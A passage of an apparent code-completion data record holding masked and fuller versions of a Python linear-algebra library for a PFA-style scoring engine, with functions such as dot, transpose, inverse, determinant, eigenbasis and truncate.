< 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef np():\n import numpy\n return numpy\n\n\ndef rowKeys(x):\n return set(x.keys())\n\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in\n list(x.values())])\n\n\n<mask token>\n\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\n\n<mask token>\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\n<mask token>\n\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef np():\n import numpy\n return numpy\n\n\ndef rowKeys(x):\n return set(x.keys())\n\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in\n list(x.values())])\n\n\ndef arraysToMatrix(x):\n return np().matrix(x, dtype=np().double)\n\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\n\n<mask token>\n\n\ndef matrixToArrays(x):\n return x.tolist()\n\n\ndef mapsToMatrix(x, rows, cols):\n return np().matrix([[x.get(i, {}).get(j, 0.0) for j in cols] for i in\n rows], dtype=np().double)\n\n\ndef mapToRowVector(x, keys):\n return np().matrix([x.get(k, 0.0) for k in keys], dtype=np().double).T\n\n\ndef rowVectorToMap(x, keys):\n return dict(list(zip(keys, x.T.tolist()[0])))\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\ndef raggedArray(x):\n collens = list(map(len, x))\n return max(collens) != min(collens)\n\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': 